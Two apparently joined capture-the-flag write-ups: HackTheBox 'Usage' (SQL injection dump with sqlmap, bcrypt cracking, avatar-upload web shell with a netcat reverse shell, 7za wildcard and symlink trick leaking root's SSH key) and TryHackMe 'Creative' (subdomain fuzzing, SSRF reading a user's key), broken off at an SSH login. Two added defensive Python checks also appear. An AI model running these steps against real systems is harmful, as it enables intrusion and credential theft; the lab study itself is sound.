HackTheBox - Usage

  1. Reconnaissance and Scanning
  2. Enumeration
    1. sqlmap
    2. john
    3. Shell upload
  3. User.txt
  4. Privilege escalation

Intro

Usage is an easy-rated machine. It exploits a SQL injection vulnerability to reach the database and retrieve a user's login credentials, then uses vulnerabilities present in an old version of the Laravel admin framework to upload a shell and get RCE.

Reconnaissance and Scanning

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: HEAD
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the domain to the hosts file and browse to the site on port 80.


Enumeration

Trying SQLi and XSS inputs gave no result, so I browsed through the other parts of the site. Clicking Admin took me to another subdomain, admin.usage.htb. Add it to the hosts file to access it.


Another login form, this time for the admin panel. I could not perform SQLi here either, so I went back to the original page.

I tried registering an account and logging in, but after login I got nothing special apart from some text.


That left only the Reset Password page, where I got an email input. Trying SQLi here, the server did process my payload.


sqlmap

Use Burp Suite to capture the request content (with the payload removed).


Use sqlmap to perform the SQLi with the saved request, targeting the email parameter.

┌──(kalikali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -p email --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___["]_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . [.]     | .'| . |                                                                                                                                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[23:57:30] [INFO] parsing HTTP request from 'request.txt'
[23:57:30] [INFO] resuming back-end DBMS 'mysql' 
[23:57:30] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=MIkLtbJSRbSB12kmbrAHgIrQmZ5sfn3GNujMZt9v&email=admin@mail.com' AND 7936=(SELECT (CASE WHEN (7936=7936) THEN 7936 ELSE (SELECT 2488 UNION SELECT 3253) END))-- dkmV

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: _token=MIkLtbJSRbSB12kmbrAHgIrQmZ5sfn3GNujMZt9v&email=admin@mail.com' AND 3261=BENCHMARK(5000000,MD5(0x6f7a696c))-- QjGd
---
[23:57:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL 8
[23:57:30] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:57:30] [INFO] fetching current database
[23:57:30] [INFO] resumed: usage_blog
[23:57:30] [INFO] fetching tables for database: 'usage_blog'
[23:57:30] [INFO] fetching number of tables for database 'usage_blog'
[23:57:30] [INFO] resumed: 15
[23:57:30] [INFO] resumed: admin_menu
[23:57:30] [INFO] resumed: admin_operation_log
[23:57:30] [INFO] resumed: admin_permissions
[23:57:30] [INFO] resumed: admin_role_menu
[23:57:30] [INFO] resuming partial value: admi
[23:57:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:57:30] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
n_role_permissions
[23:57:51] [INFO] retrieved: admin_role_users
[23:58:05] [INFO] retrieved: admin_roles
[23:58:11] [INFO] retrieved: admin_user_permissions
[23:58:46] [INFO] retrieved: admin_users
[23:58:53] [INFO] retrieved: blog
[23:59:01] [INFO] retrieved: failed_jobs
[23:59:24] [INFO] retrieved: migrations
[23:59:46] [INFO] retrieved: password_reset_token

Continue with the usage_blog database and the admin_users table.

┌──(kali㉿kali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -D usage_blog -T admin_users --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___[']_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . ["]     | .'| . |                                                                                                                                                                                               
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

.......
[00:07:18] [INFO] fetching columns for table 'admin_users' in database 'usage_blog'
[00:07:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:07:18] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
8
[00:07:22] [INFO] retrieved: avatar
[00:07:32] [INFO] retrieved: created_at
[00:07:53] [INFO] retrieved: id
[00:07:56] [INFO] retrieved: name
[00:08:03] [INFO] retrieved: password
[00:08:24] [INFO] retrieved: remember_token
[00:08:49] [INFO] retrieved: updated_at
[00:09:07] [INFO] retrieved: username
[00:09:20] [INFO] fetching entries for table 'admin_users' in database 'usage_blog'
[00:09:20] [INFO] fetching number of entries for table 'admin_users' in database 'usage_blog'
[00:09:20] [INFO] resumed: 1
[00:09:20] [INFO] retrieved: Administrator
[00:09:46] [INFO] retrieved: 

Continue with the two columns username and password.

┌──(kalikali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -D usage_blog -T admin_users -C username,password --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___[)]_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . [(]     | .'| . |                                                                                                                                                                                               
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

[00:12:26] [INFO] fetching entries of column(s) 'password,username' for table 'admin_users' in database 'usage_blog'
[00:12:26] [INFO] fetching number of column(s) 'password,username' entries for table 'admin_users' in database 'usage_blog'
[00:12:26] [INFO] resumed: 1
[00:12:26] [INFO] resumed: $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
[00:12:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:12:26] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
admin
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

[00:12:36] [INFO] table 'usage_blog.admin_users' dumped to CSV file '/root/.local/share/sqlmap/output/usage.htb/dump/usage_blog/admin_users.csv'
[00:12:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[00:12:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'

john

Copy this hash to a file and use john to crack the password.

┌──(kalikali)-[~/HTB-Usage]
└─$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**********        (?)     
1g 0:00:00:16 DONE (2024-05-07 00:17) 0.06112g/s 99.02p/s 99.02c/s 99.02C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Shell upload

Try logging into the admin panel.


Since I already have admin rights, I'll look for somewhere to upload a shell.

In the account settings I found the avatar upload. Searching for upload vulnerabilities in the Laravel admin panel version 1.8.17, I found CVE-2023-24249.

I'll add the payload to an arbitrary image.

┌──(kalikali)-[~/Downloads]
└─$  dp.jpg 
    1 image files updated

Upload this image through the admin panel (tick the "Continue creating" box) and turn Intercept: ON in Burp Suite to perform the upload.


Start a listener: nc -lnvp 9001

Browse to admin.usage.htb/uploads/images/ and append the name of the shell file that was just uploaded.

┌──(kalikali)-[~/Downloads]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.150] from (UNKNOWN) [10.10.11.18] 36368
bash: cannot set terminal process group (1227): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
dash@usage:/var/www/html/project_admin/public/uploads/images$ 

User.txt

dash@usage:/var/www/html/project_admin/public/uploads/images$ cd
cd
dash@usage:~$ ls -la
ls -la
total 248
drwxr-x--- 6 dash dash   4096 May  7 08:48 .
drwxr-xr-x 4 root root   4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root      9 Apr  2 20:22 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash   3771 Jan  6  2022 .bashrc
drwx------ 3 dash dash   4096 Aug  7  2023 .cache
drwxrwxr-x 4 dash dash   4096 Aug 20  2023 .config
drwxrwxr-x 3 dash dash   4096 Aug  7  2023 .local
-rw-r--r-- 1 dash dash     32 Oct 26  2023 .monit.id
-rw-r--r-- 1 dash dash      5 May  7 08:48 .monit.pid
-rw------- 1 dash dash   1192 May  7 08:48 .monit.state
-rwx------ 1 dash dash    707 Oct 26  2023 .monitrc
-rw-r--r-- 1 dash dash    807 Jan  6  2022 .profile
drwx------ 2 dash dash   4096 May  7 08:15 .ssh
-rwxr-xr-x 1 dash dash  55816 May  7 08:16 customchmod
-rwxr-xr-x 1 dash dash 141832 May  7 08:20 customcp
-rwxrwxrwx 1 dash dash      0 May  7 08:17 data
-rw-r----- 1 root dash     33 May  7 08:05 user.txt

Privilege escalation

Looking through the files in dash's home directory, I found a password in .monitrc.

dash@usage:~$ cat .monitrc
cat .monitrc
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:******************

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert


#System Monitoring 
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert 
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
       if space usage > 80% then alert

I tried ssh as dash but it did not work. Checking /etc/passwd I found one more user, xander. Try ssh as this user with the password just found.

┌──(kalikali)-[~/Downloads]
└─$ ssh xander@10.10.11.18
xander@10.10.11.18's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Tue May  7 08:50:59 AM UTC 2024

  System load:           0.5537109375
  Usage of /:            66.3% of 6.53GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             258
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.18
  IPv6 address for eth0: dead:beef::250:56ff:feb9:a482

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue May  7 08:34:25 2024 from 10.10.14.5
xander@usage:~$ 

Try the simple escalation checks.

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management
    
xander@usage:~$ file /usr/bin/usage_management
/usr/bin/usage_management: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fdb8c912d98c85eb5970211443440a15d910ce7f, for GNU/Linux 3.2.0, not stripped

Running strings on this binary, a few things stand out.

PTE1
u+UH
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 
Invalid choice.

For the line /usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *, I found a way to exploit it in the HackTricks book, under the name Wildcards Spare tricks.

I'll try to grab root's private key (although I'm not sure it exists).

xander@usage:~$ cd /var/www/html/
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor                (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--       
Path = /var/backups/project.zip
Type = zip
Physical Size = 54871532

Scanning the drive:
          
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----


WARNING: No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW


WARNING: No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi


WARNING: No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q


WARNING: No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs


WARNING: No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=


WARNING: No more files
-----END OPENSSH PRIVATE KEY-----

2984 folders, 17973 files, 113884398 bytes (109 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 20957

                                                                               
Files read from disk: 17973
Archive size: 54871955 bytes (53 MiB)

Scan WARNINGS for files and folders:

-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07********************* : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1W*************************** : No more files
H2sfTWZeFDLGmqMhrqDdAAAA************************= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
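The failure above is a privileged job running a shell wildcard over a tree that a lower-privileged user can write to: with 7za, a file named @something is read as a list file, and the symlink it points at is opened as root. The pre-flight audit and argument builder below are an added example, not the box's usage_management code; the temporary tree it builds is constructed test data, and the tool path and archive path are taken from the strings output above.

```python
"""Pre-flight audit for a privileged backup that archives a user-writable tree.

Added example, not the machine's usage_management code. build_demo_tree()
creates constructed test data in a temporary directory.
"""
import os
import tempfile
from pathlib import Path

# Command seen in the strings output, minus the shell '*'.
ARCHIVE_CMD = ["/usr/bin/7za", "a", "/var/backups/project.zip", "-tzip", "-snl", "-mmt", "--"]


def audit_backup_tree(root):
    """Return sorted (relative_path, problem) findings for everything under root."""
    root = Path(root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            rel = entry.relative_to(root).as_posix()
            # A shell '*' expands to exactly these names; 7za reads '@name' as a
            # list file and '-name' as a switch, which '--' did not prevent above.
            if name.startswith(("@", "-")):
                findings.append((rel, "name would be parsed as a switch or list file"))
            if entry.is_symlink():
                target = Path(os.path.realpath(entry))
                # -snl stores links as links, but a list file that is itself a
                # symlink is still opened and read with the job's privileges.
                if target != root and root not in target.parents:
                    findings.append((rel, f"symlink leaves the tree -> {target}"))
    return sorted(findings)


def safe_archive_args(root):
    """Argument vector to use instead of the shell wildcard: every entry is
    passed as './name', so no entry can start with '@' or '-'."""
    names = sorted(os.listdir(root))
    return ARCHIVE_CMD + [f"./{name}" for name in names]


def build_demo_tree():
    """Constructed tree mirroring the writeup's setup (test data only)."""
    base = Path(tempfile.mkdtemp(prefix="backup_audit_"))
    (base / "index.php").write_text("<?php\n")
    (base / "@id_rsa").touch()                                  # '@' name: list-file trigger
    os.symlink("/outside/placeholder_secret", base / "id_rsa")  # placeholder target outside the tree
    os.symlink("index.php", base / "local_link")                # stays inside, harmless
    return base


if __name__ == "__main__":
    demo = build_demo_tree()
    problems = audit_backup_tree(demo)
    for path, problem in problems:
        print(f"{path}: {problem}")
    print("refusing to run" if problems else " ".join(safe_archive_args(demo)))
```

The real fix is structural: a root job should not read a tree that a web or shell user can write to, and the audit only makes that boundary visible before the archive runs.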

Copy the contents of this key, strip the extra text, and save it as id_rsa.

┌──(kalikali)-[~/p0wny-shell]
└─$ chmod 600 id_rsa
┌──(kalikali)-[~/p0wny-shell]
└─$ ssh -i id_rsa  root@10.10.11.18 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Tue May  7 09:33:54 AM UTC 2024

  System load:           0.0390625
  Usage of /:            65.6% of 6.53GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             230
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.18
  IPv6 address for eth0: dead:beef::250:56ff:feb9:6f7b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May  7 09:02:51 2024 from 10.10.14.58
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@usage:~# ls -la
total 44
drwx------  7 root root 4096 May  7 08:53 .
drwxr-xr-x 19 root root 4096 Apr  2 21:15 ..
lrwxrwxrwx  1 root root    9 Apr  2 20:22 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwxr-xr-x  3 root root 4096 Aug 24  2023 .cache
-rwxr-xr-x  1 root root  307 Apr  3 13:24 cleanup.sh
drwxr-xr-x  4 root root 4096 Aug 22  2023 .config
drwxr-xr-x  3 root root 4096 Aug 21  2023 .local
lrwxrwxrwx  1 root root    9 Apr  2 20:22 .mysql_history -> /dev/null
-rw-r-----  1 root root   33 May  7 08:53 root.txt
drwx------  3 root root 4096 Aug  6  2023 snap
drwx------  2 root root 4096 Apr  2 23:07 .ssh
-rw-r--r--  1 root root 1444 Oct 28  2023 usage_management.c
root@usage:~#

TryHackMe - Creative

  1. Reconnaissance and Scanning
  2. Enumeration
  3. SSH
  4. Privilege escalation

Reconnaissance and Scanning

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOIFbjvSW+v5RoDWDKFI//sn2LxlSxk2ovUPyUzpB1g/XQLlbF1oy3To2D8N8LAWwrLForz4IJ4JrZXR5KvRK8Y=
|   256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFf4qwz85WzZVwohJm4pYByLpBj7j2JiQp4cBqmaBwYV
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://creative.thm
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the domain to the hosts file

nano /etc/hosts

10.10.55.1 creative.thm

Enumeration

Browse to the domain on port 80. After the simple approaches gave no result, I tried directory discovery with dirsearch. While waiting for its results, since this machine has a domain, I immediately thought of searching for subdomains of it, using ffuf.

dirsearch

┌──(rootkali)-[/home/kali]
└─# dirsearch -u http://creative.thm
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_creative.thm/_24-04-14_12-45-22.txt

Target: http://creative.thm/

[12:45:22] Starting: 
[12:46:05] 403 -  564B  - /assets/                                          
[12:46:05] 301 -  178B  - /assets  ->  http://creative.thm/assets/          
                                                                             
Task Completed

ffuf

┌──(rootkali)-[/home/kali]
└─# ffuf -u http://creative.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.creative.thm" -mc 200


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://creative.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.creative.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

beta                    [Status: 200, Size: 591, Words: 91, Lines: 20, Duration: 252ms]
:: Progress: [114441/114441] :: Job [1/1] :: 178 req/sec :: Duration: [0:11:26] :: Errors: 0 ::

Accessing /assets/ gave me a Forbidden error, so no access to this directory. Back to the subdomain just found: add it to the hosts file.

nano /etc/hosts

10.10.55.1 creative.thm beta.creative.thm

Browse to the new subdomain


Here I have a URL-checking page. After experimenting with inputs for a while, I noticed that for invalid inputs (not in URL format, or anything else), instead of validating the input and reporting that it is malformed, the web server just returns the word Dead. This means the server processes any input I enter, so I can perform SSRF here.

Use SSRFmap to check.

First, I used Burp Suite to capture the request


Save this request to a file named request.txt

POST / HTTP/1.1
Host: beta.creative.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://beta.creative.thm
Connection: close
Referer: http://beta.creative.thm/
Upgrade-Insecure-Requests: 1

url=..%2F..%2F..%2F..%2Fect%2Fpasswd

With the url parameter in this request, I'll use SSRFmap with the modules that can return results, such as portscan, networkscan and custom (the other modules are not used, since no such services run on this web server, to avoid wasting time scanning).

After running the portscan module I found one more port besides port 80 open on localhost

┌──(rootkali)-[/home/kali/SSRFmap]
└─# python ssrfmap.py -r request.txt -p url -m portscan
 _____ _________________                     
/  ___/  ___| ___ \  ___|                    
\ `--.\ `--.| |_/ / |_ _ __ ___   __ _ _ __  
 `--. \`--. \    /|  _| '_ ` _ \ / _` | '_ \ 
/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |
\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ 
                                      | |    
                                      |_|    
[INFO]:Module 'portscan' launched !
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°443                    
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°23                    
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°25                    
        [13:26:45] IP:127.0.0.1   , Found open      port n°80    
        .....
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°3999                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°740                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°12346                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°802                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°1127                    
        [13:28:21] IP:127.0.0.1   , Found open      port n°1337                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°606                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°2600                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°1414   
        ......


To access the paths discovered this way, I had to go back and append each path to the url parameter to check it. To make this easier I used Burp Suite to capture the request and send it to Repeater.


The url part is encoded, so to access the paths I also have to URL-encode them.
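The check the URL-checker page above is missing (anything typed into url is fetched, including loopback addresses and path-style values such as the ../../etc/passwd payload): an added example, not code from the room or the writeup. The resolver and allowed_ports parameters are assumptions, and the hostnames and addresses in the resolver stub are constructed test data.

```python
"""Allow-list validation of a user-supplied URL before the server fetches it.

Added example, not code from the room. The default resolver uses getaddrinfo;
tests inject a constructed resolver so the check runs offline.
"""
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
DEFAULT_PORTS = {80, 443}


def default_resolver(host):
    """Every address the fetcher could actually connect to for this host."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_public_address(ip_text):
    """True only for globally routable unicast addresses."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # judge ::ffff:127.0.0.1 as 127.0.0.1
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_target_url(raw, resolver=default_resolver, allowed_ports=DEFAULT_PORTS):
    """Return (ok, reason); ok is True only when every check passes.

    The check judges the addresses the fetch would reach, not the host string,
    so short or decimal IP spellings and internal DNS names are caught alike.
    """
    parts = urlsplit(raw.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"      # rejects file://, gopher:// and bare paths
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"    # http://trusted@evil/ confusion
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in allowed_ports:
        return False, "port not allowed"
    # Dot segments in the decoded path would let a path-based fetcher escape its base.
    if any(seg == ".." for seg in unquote(parts.path).split("/")):
        return False, "path traversal"
    try:
        ipaddress.ip_address(host)
        addresses = [host]                      # IP literal: judge it directly
    except ValueError:
        addresses = resolver(host)              # hostname: judge what it resolves to
    if not addresses:
        return False, "host does not resolve"
    blocked = [a for a in addresses if not is_public_address(a)]
    if blocked:
        return False, "non-public address: " + ", ".join(blocked)
    # The caller should connect to one of `addresses` rather than re-resolving,
    # otherwise a DNS record that changes between checks could point inside later.
    return True, "ok"
```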


SSH

Note the .ssh directory; an ssh key may be stored there.


Get id_rsa


Save this key locally and log in over ssh

┌──(rootkali)-[/home/kali]
└─# chmod 600 id_rsa                   
                                                                                                                                                                                                                                                             
┌──(rootkali)-[/home/kali]
└─# ssh -i id_rsa saad@10.10.55.1      
The authenticity of host '10.10.55.1 (10.10.55.1)' can't be established.
ED25519 key fingerprint is SHA256:09XvTnhtDcy1LRcuA8MJ6i3a1gN/7Prv5xmZF9v8Gq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
